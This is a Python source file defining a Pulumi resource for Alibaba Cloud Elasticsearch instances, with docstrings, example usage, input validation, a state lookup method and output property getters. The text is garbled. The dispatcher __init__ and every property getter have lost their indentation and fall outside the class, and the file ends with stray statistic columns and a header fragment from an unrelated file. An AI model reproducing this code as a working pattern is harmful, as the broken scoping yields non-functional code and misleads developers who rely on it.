                 enable_kibana_private_network: Optional[pulumi.Input[bool]] = None,
                 enable_kibana_public_network: Optional[pulumi.Input[bool]] = None,
                 enable_public: Optional[pulumi.Input[bool]] = None,
                 instance_charge_type: Optional[pulumi.Input[str]] = None,
                 kibana_private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 kibana_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 kms_encrypted_password: Optional[pulumi.Input[str]] = None,
                 kms_encryption_context: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 master_node_spec: Optional[pulumi.Input[str]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 period: Optional[pulumi.Input[int]] = None,
                 private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 protocol: Optional[pulumi.Input[str]] = None,
                 public_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 resource_group_id: Optional[pulumi.Input[str]] = None,
                 setting_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 version: Optional[pulumi.Input[str]] = None,
                 vswitch_id: Optional[pulumi.Input[str]] = None,
                 zone_count: Optional[pulumi.Input[int]] = None,
                 __props__=None):
        """
        Provides an Elasticsearch instance resource. It contains data nodes, dedicated master node(optional) and etc. It can be associated with private IP whitelists and kibana IP whitelist.

        > **NOTE:** Only one operation is supported in a request. So if `data_node_spec` and `data_node_disk_size` are both changed, system will respond error.

        > **NOTE:** At present, `version` can not be modified once instance has been created.

        ## Example Usage

        Basic Usage

        ```python
        import pulumi
        import pulumi_alicloud as alicloud

        instance = alicloud.elasticsearch.Instance("instance",
            client_node_amount=2,
            client_node_spec="elasticsearch.sn2ne.large",
            data_node_amount=2,
            data_node_disk_size=20,
            data_node_disk_type="cloud_ssd",
            data_node_spec="elasticsearch.sn2ne.large",
            description="description",
            instance_charge_type="PostPaid",
            password="Your password",
            protocol="HTTPS",
            tags={
                "key1": "value1",
                "key2": "value2",
            },
            version="5.5.3_with_X-Pack",
            vswitch_id="some vswitch id",
            zone_count=2)
        ```

        ## Import

        Elasticsearch can be imported using the id, e.g.

        ```sh
         $ pulumi import alicloud:elasticsearch/instance:Instance example es-cn-abcde123456
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[int] client_node_amount: The Elasticsearch cluster's client node quantity, between 2 and 25.
        :param pulumi.Input[str] client_node_spec: The client node spec. If specified, a client node will be created.
        :param pulumi.Input[int] data_node_amount: The Elasticsearch cluster's data node quantity, between 2 and 50.
        :param pulumi.Input[bool] data_node_disk_encrypted: Whether to encrypt the data node disk. Valid values are `true`, `false`. Default to `false`.
        :param pulumi.Input[int] data_node_disk_size: The single data node storage space.
               - `cloud_ssd`: An SSD disk, supports a maximum of 2048 GiB (2 TB).
        :param pulumi.Input[str] data_node_disk_type: The data node disk type. Supported values: cloud_ssd, cloud_efficiency.
        :param pulumi.Input[str] data_node_spec: The data node specifications of the Elasticsearch instance.
        :param pulumi.Input[str] description: The description of the instance. It is a string of 0 to 30 characters.
        :param pulumi.Input[bool] enable_kibana_private_network: Bool, default to false. When it is set to true, the instance can close Kibana private network access.
        :param pulumi.Input[bool] enable_kibana_public_network: Bool, default to true. When it is set to false, the instance can enable Kibana public network access.
        :param pulumi.Input[bool] enable_public: Bool, default to false. When it is set to true, the instance can enable public network access.
        :param pulumi.Input[str] instance_charge_type: Valid values are `PrePaid`, `PostPaid`. Default to `PostPaid`. From version 1.69.0, the Elasticsearch cluster allows you to update your instance_charge_type from `PostPaid` to `PrePaid`, the following attributes are required: `period`. But, updating from `PrePaid` to `PostPaid` is not supported.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] kibana_private_whitelists: Set the Kibana's IP whitelist in private network.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] kibana_whitelists: Set the Kibana's IP whitelist in internet network.
        :param pulumi.Input[str] kms_encrypted_password: A KMS-encrypted password used for the instance. If the `password` is filled in, this field will be ignored, but you have to specify one of `password` and `kms_encrypted_password` fields.
        :param pulumi.Input[Mapping[str, Any]] kms_encryption_context: A KMS encryption context used to decrypt `kms_encrypted_password` before creating or updating an instance with `kms_encrypted_password`. See [Encryption Context](https://www.alibabacloud.com/help/doc-detail/42975.htm). It is valid when `kms_encrypted_password` is set.
        :param pulumi.Input[str] master_node_spec: The dedicated master node spec. If specified, a dedicated master node will be created.
        :param pulumi.Input[str] password: The password of the instance. The password can be 8 to 30 characters in length and must contain three of the following conditions: uppercase letters, lowercase letters, numbers, and special characters (`!@#$%^&*()_+-=`).
        :param pulumi.Input[int] period: The duration that you will buy the Elasticsearch instance (in months). It is valid when instance_charge_type is `PrePaid`. Valid values: [1~9], 12, 24, 36. Default to 1. From version 1.69.2, when this value is modified, the resource can renew a `PrePaid` instance.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] private_whitelists: Set the instance's IP whitelist in VPC network.
        :param pulumi.Input[str] protocol: Elasticsearch protocol. Supported values: `HTTP`, `HTTPS`. Default is `HTTP`.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] public_whitelists: Set the instance's IP whitelist in internet network.
        :param pulumi.Input[str] resource_group_id: The ID of the resource group to which the Elasticsearch instance belongs.
        :param pulumi.Input[Mapping[str, Any]] setting_config: The YML configuration of the instance. [Detailed introduction](https://www.alibabacloud.com/help/doc-detail/61336.html).
        :param pulumi.Input[Mapping[str, Any]] tags: A mapping of tags to assign to the resource.
               - key: It can be up to 128 characters in length. It cannot begin with "aliyun", "acs:". It cannot contain "http://" and "https://". It cannot be a null string.
               - value: It can be up to 128 characters in length. It cannot contain "http://" and "https://". It can be a null string.
        :param pulumi.Input[str] version: Elasticsearch version. Supported values: `5.5.3_with_X-Pack`, `6.3_with_X-Pack`, `6.7_with_X-Pack`, `6.8_with_X-Pack`, `7.4_with_X-Pack` and `7.7_with_X-Pack`.
        :param pulumi.Input[str] vswitch_id: The ID of VSwitch.
        :param pulumi.Input[int] zone_count: The Multi-AZ supported for Elasticsearch, between 1 and 3. The `data_node_amount` value must be an integral multiple of the `zone_count` value.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: InstanceArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides an Elasticsearch instance resource. It contains data nodes, dedicated master node(optional) and etc. It can be associated with private IP whitelists and kibana IP whitelist.

        > **NOTE:** Only one operation is supported in a request. So if `data_node_spec` and `data_node_disk_size` are both changed, system will respond error.

        > **NOTE:** At present, `version` can not be modified once instance has been created.

        ## Example Usage

        Basic Usage

        ```python
        import pulumi
        import pulumi_alicloud as alicloud

        instance = alicloud.elasticsearch.Instance("instance",
            client_node_amount=2,
            client_node_spec="elasticsearch.sn2ne.large",
            data_node_amount=2,
            data_node_disk_size=20,
            data_node_disk_type="cloud_ssd",
            data_node_spec="elasticsearch.sn2ne.large",
            description="description",
            instance_charge_type="PostPaid",
            password="Your password",
            protocol="HTTPS",
            tags={
                "key1": "value1",
                "key2": "value2",
            },
            version="5.5.3_with_X-Pack",
            vswitch_id="some vswitch id",
            zone_count=2)
        ```

        ## Import

        Elasticsearch can be imported using the id, e.g.

        ```sh
         $ pulumi import alicloud:elasticsearch/instance:Instance example es-cn-abcde123456
        ```

        :param str resource_name: The name of the resource.
        :param InstanceArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(InstanceArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 client_node_amount: Optional[pulumi.Input[int]] = None,
                 client_node_spec: Optional[pulumi.Input[str]] = None,
                 data_node_amount: Optional[pulumi.Input[int]] = None,
                 data_node_disk_encrypted: Optional[pulumi.Input[bool]] = None,
                 data_node_disk_size: Optional[pulumi.Input[int]] = None,
                 data_node_disk_type: Optional[pulumi.Input[str]] = None,
                 data_node_spec: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 enable_kibana_private_network: Optional[pulumi.Input[bool]] = None,
                 enable_kibana_public_network: Optional[pulumi.Input[bool]] = None,
                 enable_public: Optional[pulumi.Input[bool]] = None,
                 instance_charge_type: Optional[pulumi.Input[str]] = None,
                 kibana_private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 kibana_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 kms_encrypted_password: Optional[pulumi.Input[str]] = None,
                 kms_encryption_context: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 master_node_spec: Optional[pulumi.Input[str]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 period: Optional[pulumi.Input[int]] = None,
                 private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 protocol: Optional[pulumi.Input[str]] = None,
                 public_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 resource_group_id: Optional[pulumi.Input[str]] = None,
                 setting_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 version: Optional[pulumi.Input[str]] = None,
                 vswitch_id: Optional[pulumi.Input[str]] = None,
                 zone_count: Optional[pulumi.Input[int]] = None,
                 __props__=None):
        # Shared implementation behind both __init__ overloads: normalizes
        # resource options, validates required inputs, builds the property bag
        # and registers the resource with the Pulumi engine.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource (as opposed to looking one up by id):
            # __props__ is reserved for the lookup path used by Instance.get().
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = InstanceArgs.__new__(InstanceArgs)
            __props__.__dict__["client_node_amount"] = client_node_amount
            __props__.__dict__["client_node_spec"] = client_node_spec
            # Required properties may legitimately be absent when an urn is
            # supplied (the engine rehydrates state), hence the `not opts.urn`.
            if data_node_amount is None and not opts.urn:
                raise TypeError("Missing required property 'data_node_amount'")
            __props__.__dict__["data_node_amount"] = data_node_amount
            __props__.__dict__["data_node_disk_encrypted"] = data_node_disk_encrypted
            if data_node_disk_size is None and not opts.urn:
                raise TypeError("Missing required property 'data_node_disk_size'")
            __props__.__dict__["data_node_disk_size"] = data_node_disk_size
            if data_node_disk_type is None and not opts.urn:
                raise TypeError("Missing required property 'data_node_disk_type'")
            __props__.__dict__["data_node_disk_type"] = data_node_disk_type
            if data_node_spec is None and not opts.urn:
                raise TypeError("Missing required property 'data_node_spec'")
            __props__.__dict__["data_node_spec"] = data_node_spec
            __props__.__dict__["description"] = description
            __props__.__dict__["enable_kibana_private_network"] = enable_kibana_private_network
            __props__.__dict__["enable_kibana_public_network"] = enable_kibana_public_network
            __props__.__dict__["enable_public"] = enable_public
            __props__.__dict__["instance_charge_type"] = instance_charge_type
            __props__.__dict__["kibana_private_whitelists"] = kibana_private_whitelists
            __props__.__dict__["kibana_whitelists"] = kibana_whitelists
            __props__.__dict__["kms_encrypted_password"] = kms_encrypted_password
            __props__.__dict__["kms_encryption_context"] = kms_encryption_context
            __props__.__dict__["master_node_spec"] = master_node_spec
            __props__.__dict__["password"] = password
            __props__.__dict__["period"] = period
            __props__.__dict__["private_whitelists"] = private_whitelists
            __props__.__dict__["protocol"] = protocol
            __props__.__dict__["public_whitelists"] = public_whitelists
            __props__.__dict__["resource_group_id"] = resource_group_id
            __props__.__dict__["setting_config"] = setting_config
            __props__.__dict__["tags"] = tags
            if version is None and not opts.urn:
                raise TypeError("Missing required property 'version'")
            __props__.__dict__["version"] = version
            if vswitch_id is None and not opts.urn:
                raise TypeError("Missing required property 'vswitch_id'")
            __props__.__dict__["vswitch_id"] = vswitch_id
            __props__.__dict__["zone_count"] = zone_count
            # Output-only properties start as None; the provider fills them in.
            __props__.__dict__["domain"] = None
            __props__.__dict__["kibana_domain"] = None
            __props__.__dict__["kibana_port"] = None
            __props__.__dict__["port"] = None
            __props__.__dict__["status"] = None
        super(Instance, __self__).__init__(
            'alicloud:elasticsearch/instance:Instance',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            client_node_amount: Optional[pulumi.Input[int]] = None,
            client_node_spec: Optional[pulumi.Input[str]] = None,
            data_node_amount: Optional[pulumi.Input[int]] = None,
            data_node_disk_encrypted: Optional[pulumi.Input[bool]] = None,
            data_node_disk_size: Optional[pulumi.Input[int]] = None,
            data_node_disk_type: Optional[pulumi.Input[str]] = None,
            data_node_spec: Optional[pulumi.Input[str]] = None,
            description: Optional[pulumi.Input[str]] = None,
            domain: Optional[pulumi.Input[str]] = None,
            enable_kibana_private_network: Optional[pulumi.Input[bool]] = None,
            enable_kibana_public_network: Optional[pulumi.Input[bool]] = None,
            enable_public: Optional[pulumi.Input[bool]] = None,
            instance_charge_type: Optional[pulumi.Input[str]] = None,
            kibana_domain: Optional[pulumi.Input[str]] = None,
            kibana_port: Optional[pulumi.Input[int]] = None,
            kibana_private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            kibana_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            kms_encrypted_password: Optional[pulumi.Input[str]] = None,
            kms_encryption_context: Optional[pulumi.Input[Mapping[str, Any]]] = None,
            master_node_spec: Optional[pulumi.Input[str]] = None,
            password: Optional[pulumi.Input[str]] = None,
            period: Optional[pulumi.Input[int]] = None,
            port: Optional[pulumi.Input[int]] = None,
            private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            protocol: Optional[pulumi.Input[str]] = None,
            public_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            resource_group_id: Optional[pulumi.Input[str]] = None,
            setting_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
            status: Optional[pulumi.Input[str]] = None,
            tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
            version: Optional[pulumi.Input[str]] = None,
            vswitch_id: Optional[pulumi.Input[str]] = None,
            zone_count: Optional[pulumi.Input[int]] = None) -> 'Instance':
        """
        Get an existing Instance resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[int] client_node_amount: The Elasticsearch cluster's client node quantity, between 2 and 25.
        :param pulumi.Input[str] client_node_spec: The client node spec. If specified, a client node will be created.
        :param pulumi.Input[int] data_node_amount: The Elasticsearch cluster's data node quantity, between 2 and 50.
        :param pulumi.Input[bool] data_node_disk_encrypted: Whether to encrypt the data node disk. Valid values are `true`, `false`. Default to `false`.
        :param pulumi.Input[int] data_node_disk_size: The single data node storage space.
               - `cloud_ssd`: An SSD disk, supports a maximum of 2048 GiB (2 TB).
        :param pulumi.Input[str] data_node_disk_type: The data node disk type. Supported values: cloud_ssd, cloud_efficiency.
        :param pulumi.Input[str] data_node_spec: The data node specifications of the Elasticsearch instance.
        :param pulumi.Input[str] description: The description of the instance. It is a string of 0 to 30 characters.
        :param pulumi.Input[str] domain: Instance connection domain (only VPC network access supported).
        :param pulumi.Input[bool] enable_kibana_private_network: Bool, default to false. When it is set to true, the instance can close Kibana private network access.
        :param pulumi.Input[bool] enable_kibana_public_network: Bool, default to true. When it is set to false, the instance can enable Kibana public network access.
        :param pulumi.Input[bool] enable_public: Bool, default to false. When it is set to true, the instance can enable public network access.
        :param pulumi.Input[str] instance_charge_type: Valid values are `PrePaid`, `PostPaid`. Default to `PostPaid`. From version 1.69.0, the Elasticsearch cluster allows you to update your instance_charge_type from `PostPaid` to `PrePaid`, the following attributes are required: `period`. But, updating from `PrePaid` to `PostPaid` is not supported.
        :param pulumi.Input[str] kibana_domain: Kibana console domain (Internet access supported).
        :param pulumi.Input[int] kibana_port: Kibana console port.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] kibana_private_whitelists: Set the Kibana's IP whitelist in private network.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] kibana_whitelists: Set the Kibana's IP whitelist in internet network.
        :param pulumi.Input[str] kms_encrypted_password: A KMS-encrypted password used for the instance. If the `password` is filled in, this field will be ignored, but you have to specify one of `password` and `kms_encrypted_password` fields.
        :param pulumi.Input[Mapping[str, Any]] kms_encryption_context: A KMS encryption context used to decrypt `kms_encrypted_password` before creating or updating an instance with `kms_encrypted_password`. See [Encryption Context](https://www.alibabacloud.com/help/doc-detail/42975.htm). It is valid when `kms_encrypted_password` is set.
        :param pulumi.Input[str] master_node_spec: The dedicated master node spec. If specified, a dedicated master node will be created.
        :param pulumi.Input[str] password: The password of the instance. The password can be 8 to 30 characters in length and must contain three of the following conditions: uppercase letters, lowercase letters, numbers, and special characters (`!@#$%^&*()_+-=`).
        :param pulumi.Input[int] period: The duration that you will buy the Elasticsearch instance (in months). It is valid when instance_charge_type is `PrePaid`. Valid values: [1~9], 12, 24, 36. Default to 1. From version 1.69.2, when this value is modified, the resource can renew a `PrePaid` instance.
        :param pulumi.Input[int] port: Instance connection port.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] private_whitelists: Set the instance's IP whitelist in VPC network.
        :param pulumi.Input[str] protocol: Elasticsearch protocol. Supported values: `HTTP`, `HTTPS`. Default is `HTTP`.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] public_whitelists: Set the instance's IP whitelist in internet network.
        :param pulumi.Input[str] resource_group_id: The ID of the resource group to which the Elasticsearch instance belongs.
        :param pulumi.Input[Mapping[str, Any]] setting_config: The YML configuration of the instance. [Detailed introduction](https://www.alibabacloud.com/help/doc-detail/61336.html).
        :param pulumi.Input[str] status: The Elasticsearch instance status. Includes `active`, `activating`, `inactive`. Some operations are denied when status is not `active`.
        :param pulumi.Input[Mapping[str, Any]] tags: A mapping of tags to assign to the resource.
               - key: It can be up to 128 characters in length. It cannot begin with "aliyun", "acs:". It cannot contain "http://" and "https://". It cannot be a null string.
               - value: It can be up to 128 characters in length. It cannot contain "http://" and "https://". It can be a null string.
        :param pulumi.Input[str] version: Elasticsearch version. Supported values: `5.5.3_with_X-Pack`, `6.3_with_X-Pack`, `6.7_with_X-Pack`, `6.8_with_X-Pack`, `7.4_with_X-Pack` and `7.7_with_X-Pack`.
        :param pulumi.Input[str] vswitch_id: The ID of VSwitch.
        :param pulumi.Input[int] zone_count: The Multi-AZ supported for Elasticsearch, between 1 and 3. The `data_node_amount` value must be an integral multiple of the `zone_count` value.
        """
        # Bind the provider id into the options so the engine performs a lookup
        # instead of creating a new resource.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _InstanceState.__new__(_InstanceState)

        __props__.__dict__["client_node_amount"] = client_node_amount
        __props__.__dict__["client_node_spec"] = client_node_spec
        __props__.__dict__["data_node_amount"] = data_node_amount
        __props__.__dict__["data_node_disk_encrypted"] = data_node_disk_encrypted
        __props__.__dict__["data_node_disk_size"] = data_node_disk_size
        __props__.__dict__["data_node_disk_type"] = data_node_disk_type
        __props__.__dict__["data_node_spec"] = data_node_spec
        __props__.__dict__["description"] = description
        __props__.__dict__["domain"] = domain
        __props__.__dict__["enable_kibana_private_network"] = enable_kibana_private_network
        __props__.__dict__["enable_kibana_public_network"] = enable_kibana_public_network
        __props__.__dict__["enable_public"] = enable_public
        __props__.__dict__["instance_charge_type"] = instance_charge_type
        __props__.__dict__["kibana_domain"] = kibana_domain
        __props__.__dict__["kibana_port"] = kibana_port
        __props__.__dict__["kibana_private_whitelists"] = kibana_private_whitelists
        __props__.__dict__["kibana_whitelists"] = kibana_whitelists
        __props__.__dict__["kms_encrypted_password"] = kms_encrypted_password
        __props__.__dict__["kms_encryption_context"] = kms_encryption_context
        __props__.__dict__["master_node_spec"] = master_node_spec
        __props__.__dict__["password"] = password
        __props__.__dict__["period"] = period
        __props__.__dict__["port"] = port
        __props__.__dict__["private_whitelists"] = private_whitelists
        __props__.__dict__["protocol"] = protocol
        __props__.__dict__["public_whitelists"] = public_whitelists
        __props__.__dict__["resource_group_id"] = resource_group_id
        __props__.__dict__["setting_config"] = setting_config
        __props__.__dict__["status"] = status
        __props__.__dict__["tags"] = tags
        __props__.__dict__["version"] = version
        __props__.__dict__["vswitch_id"] = vswitch_id
        __props__.__dict__["zone_count"] = zone_count
        return Instance(resource_name, opts=opts, __props__=__props__)
# --- Resolved output properties of the Instance resource (auto-generated getters) ---
@property
@pulumi.getter(name="clientNodeAmount")
def client_node_amount(self) -> pulumi.Output[Optional[int]]:
    """
    The Elasticsearch cluster's client node quantity, between 2 and 25.
    """
    return pulumi.get(self, "client_node_amount")
@property
@pulumi.getter(name="clientNodeSpec")
def client_node_spec(self) -> pulumi.Output[Optional[str]]:
    """
    The client node spec. If specified, client node will be created.
    """
    return pulumi.get(self, "client_node_spec")
@property
@pulumi.getter(name="dataNodeAmount")
def data_node_amount(self) -> pulumi.Output[int]:
    """
    The Elasticsearch cluster's data node quantity, between 2 and 50.
    """
    return pulumi.get(self, "data_node_amount")
@property
@pulumi.getter(name="dataNodeDiskEncrypted")
def data_node_disk_encrypted(self) -> pulumi.Output[Optional[bool]]:
    """
    If encrypt the data node disk. Valid values are `true`, `false`. Default to `false`.
    """
    return pulumi.get(self, "data_node_disk_encrypted")
@property
@pulumi.getter(name="dataNodeDiskSize")
def data_node_disk_size(self) -> pulumi.Output[int]:
    """
    The single data node storage space.
    - `cloud_ssd`: An SSD disk, supports a maximum of 2048 GiB (2 TB).
    """
    return pulumi.get(self, "data_node_disk_size")
@property
@pulumi.getter(name="dataNodeDiskType")
def data_node_disk_type(self) -> pulumi.Output[str]:
    """
    The data node disk type. Supported values: cloud_ssd, cloud_efficiency.
    """
    return pulumi.get(self, "data_node_disk_type")
@property
@pulumi.getter(name="dataNodeSpec")
def data_node_spec(self) -> pulumi.Output[str]:
    """
    The data node specifications of the Elasticsearch instance.
    """
    return pulumi.get(self, "data_node_spec")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
    """
    The description of the instance. It is a string of 0 to 30 characters.
    """
    return pulumi.get(self, "description")
@property
@pulumi.getter
def domain(self) -> pulumi.Output[str]:
    """
    Instance connection domain (only VPC network access supported).
    """
    return pulumi.get(self, "domain")
@property
@pulumi.getter(name="enableKibanaPrivateNetwork")
def enable_kibana_private_network(self) -> pulumi.Output[Optional[bool]]:
    """
    Bool, default to false. When it is set to true, the instance can close Kibana private network access.
    """
    return pulumi.get(self, "enable_kibana_private_network")
@property
@pulumi.getter(name="enableKibanaPublicNetwork")
def enable_kibana_public_network(self) -> pulumi.Output[Optional[bool]]:
    """
    Bool, default to true. When it is set to false, the instance can enable Kibana public network access.
    """
    return pulumi.get(self, "enable_kibana_public_network")
@property
@pulumi.getter(name="enablePublic")
def enable_public(self) -> pulumi.Output[Optional[bool]]:
    """
    Bool, default to false. When it is set to true, the instance can enable public network access.
    """
    return pulumi.get(self, "enable_public")
@property
@pulumi.getter(name="instanceChargeType")
def instance_charge_type(self) -> pulumi.Output[Optional[str]]:
    """
    Valid values are `PrePaid`, `PostPaid`. Default to `PostPaid`. From version 1.69.0, the Elasticsearch cluster allows you to update your instance_charge_type from `PostPaid` to `PrePaid`, the following attributes are required: `period`. But, updating from `PrePaid` to `PostPaid` is not supported.
    """
    return pulumi.get(self, "instance_charge_type")
@property
@pulumi.getter(name="kibanaDomain")
def kibana_domain(self) -> pulumi.Output[str]:
    """
    Kibana console domain (Internet access supported).
    """
    return pulumi.get(self, "kibana_domain")
@property
@pulumi.getter(name="kibanaPort")
def kibana_port(self) -> pulumi.Output[int]:
    """
    Kibana console port.
    """
    return pulumi.get(self, "kibana_port")
@property
@pulumi.getter(name="kibanaPrivateWhitelists")
def kibana_private_whitelists(self) -> pulumi.Output[Sequence[str]]:
    """
    Set the Kibana's IP whitelist in private network.
    """
    return pulumi.get(self, "kibana_private_whitelists")
@property
@pulumi.getter(name="kibanaWhitelists")
def kibana_whitelists(self) -> pulumi.Output[Sequence[str]]:
    """
    Set the Kibana's IP whitelist in internet network.
    """
    return pulumi.get(self, "kibana_whitelists")
@property
@pulumi.getter(name="kmsEncryptedPassword")
def kms_encrypted_password(self) -> pulumi.Output[Optional[str]]:
    """
    A KMS-encrypted password used for the instance. If the `password` is filled in, this field will be ignored, but you have to specify one of the `password` and `kms_encrypted_password` fields.
    """
    return pulumi.get(self, "kms_encrypted_password")
@property
@pulumi.getter(name="kmsEncryptionContext")
def kms_encryption_context(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
    """
    A KMS encryption context used to decrypt `kms_encrypted_password` before creating or updating an instance with `kms_encrypted_password`. See [Encryption Context](https://www.alibabacloud.com/help/doc-detail/42975.htm). It is valid when `kms_encrypted_password` is set.
    """
    return pulumi.get(self, "kms_encryption_context")
@property
@pulumi.getter(name="masterNodeSpec")
def master_node_spec(self) -> pulumi.Output[Optional[str]]:
    """
    The dedicated master node spec. If specified, dedicated master node will be created.
    """
    return pulumi.get(self, "master_node_spec")
@property
@pulumi.getter
def password(self) -> pulumi.Output[Optional[str]]:
    """
    The password of the instance. The password can be 8 to 30 characters in length and must contain three of the following conditions: uppercase letters, lowercase letters, numbers, and special characters (`!@#$%^&*()_+-=`).
    """
    return pulumi.get(self, "password")
@property
@pulumi.getter
def period(self) -> pulumi.Output[Optional[int]]:
    """
    The duration that you will buy Elasticsearch instance (in month). It is valid when instance_charge_type is `PrePaid`. Valid values: [1~9], 12, 24, 36. Default to 1. From version 1.69.2, when to modify this value, the resource can renewal a `PrePaid` instance.
    """
    return pulumi.get(self, "period")
@property
@pulumi.getter
def port(self) -> pulumi.Output[int]:
    """
    Instance connection port.
    """
    return pulumi.get(self, "port")
@property
@pulumi.getter(name="privateWhitelists")
def private_whitelists(self) -> pulumi.Output[Sequence[str]]:
    """
    Set the instance's IP whitelist in VPC network.
    """
    return pulumi.get(self, "private_whitelists")
@property
@pulumi.getter
def protocol(self) -> pulumi.Output[Optional[str]]:
    """
    Elasticsearch protocol. Supported values: `HTTP`, `HTTPS`. Default is `HTTP`.
    """
    return pulumi.get(self, "protocol")
@property
@pulumi.getter(name="publicWhitelists")
def public_whitelists(self) -> pulumi.Output[Sequence[str]]:
    """
    Set the instance's IP whitelist in internet network.
    """
    return pulumi.get(self, "public_whitelists")
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> pulumi.Output[str]:
    """
    The ID of the resource group to which the Elasticsearch instance belongs.
    """
    return pulumi.get(self, "resource_group_id")
@property
@pulumi.getter(name="settingConfig")
def setting_config(self) -> pulumi.Output[Mapping[str, Any]]:
    """
    The YML configuration of the instance. [Detailed introduction](https://www.alibabacloud.com/help/doc-detail/61336.html).
    """
    return pulumi.get(self, "setting_config")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
    """
    The Elasticsearch instance status. Includes `active`, `activating`, `inactive`. Some operations are denied when status is not `active`.
    """
    return pulumi.get(self, "status")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
    """
    A mapping of tags to assign to the resource.
    - key: It can be up to 128 characters in length. It cannot begin with "aliyun", "acs:". It cannot contain "http://" and "https://". It cannot be a null string.
    - value: It can be up to 128 characters in length. It cannot contain "http://" and "https://". It can be a null string.
    """
    return pulumi.get(self, "tags")
@property
@pulumi.getter
def version(self) -> pulumi.Output[str]:
    """
    Elasticsearch version. Supported values: `5.5.3_with_X-Pack`, `6.3_with_X-Pack`, `6.7_with_X-Pack`, `6.8_with_X-Pack`, `7.4_with_X-Pack` and `7.7_with_X-Pack`.
    """
    return pulumi.get(self, "version")
@property
@pulumi.getter(name="vswitchId")
def vswitch_id(self) -> pulumi.Output[str]:
    """
    The ID of VSwitch.
    """
    return pulumi.get(self, "vswitch_id")
@property
@pulumi.getter(name="zoneCount")
def zone_count(self) -> pulumi.Output[Optional[int]]:
    """
    The Multi-AZ supported for Elasticsearch, between 1 and 3. The `data_node_amount` value must be an integral multiple of the `zone_count` value.
    """
    return pulumi.get(self, "zone_count")
| 53.134014
| 350
| 0.672544
| 11,162
| 88,415
| 5.100161
| 0.031625
| 0.086952
| 0.084774
| 0.041737
| 0.966291
| 0.958105
| 0.946107
| 0.939555
| 0.935339
| 0.920514
| 0
| 0.007198
| 0.220675
| 88,415
| 1,663
| 351
| 53.165965
| 0.818995
| 0.379031
| 0
| 0.832292
| 1
| 0
| 0.115498
| 0.033726
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16875
| false
| 0.052083
| 0.005208
| 0
| 0.276042
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
9d7c862da747bf78ad3e2ac930d2bc114aa0febb
| 125
|
py
|
Python
|
rubin_sim/scheduler/basis_functions/__init__.py
|
RileyWClarke/flarubin
|
eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a
|
[
"MIT"
] | null | null | null |
